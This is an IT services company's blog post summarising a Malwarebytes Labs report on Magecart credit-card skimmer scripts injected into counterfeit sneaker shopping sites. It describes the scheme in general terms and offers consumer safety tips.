Bay Area IT Support & IT Services

The Intivix Blog

Business IT Articles, News and Tips

Counterfeit Sneaker Sites Under Attack

Sneakerheads met an unwelcome surprise last month: a “large-scale hacking operation” targeting counterfeit sneaker sites.

Malwarebytes Labs, a company committed to protecting consumers from malware, recently discovered malicious scripts called “Magecart attacks” installed on hundreds of counterfeit sneaker sites.

These scripts scan credit card information from buyers and send them to a remote server operated by hackers.

“We recently identified a credit card skimmer injected into hundreds of fraudulent sites selling brand name shoes,” Malwarebytes Labs explains, “unfortunate shoppers may not only be disappointed with the faux merchandise, but they will also relinquish their personal and financial data to Magecart fraudsters.”

How do they do this?

First, hackers promote these infected counterfeit sites through posts and forums that direct unsuspecting users back to the site. It’s here that consumers find Nike shoes once offered at $2,000 now selling for $134.

“To avoid falling into one of their traps, there are a couple of simple steps you can take,” Forbes’ Lee Mathews explains, “for starters, remind yourself that if something seems too good to be true, it probably is. Online counterfeiters tend to promise jaw-dropping discounts on highly sought-after items that often command a premium.”

Compelled to buy, consumers enter their card info, unaware that a malicious JavaScript was added to the bottom of the platform’s script.

“After running the JavaScript through a JS beautifier, we can see that the script is collecting submitted credit card information entered by the shopper and then sending it to a site…,” Malwarebytes Labs says, “this stolen credit card information can then be collected later by the attackers.”

To protect yourself from this kind of attack, Mathews suggests installing a browser extension to detect and block malicious scripts. Malwarebytes Labs offers one here.

Where to find more info.

To check the full list of compromised stores, visit Malwarebytes’ blog.

Follow us on LinkedIn, Twitter, Facebook, and Instagram for cybersecurity news, tips, and tricks.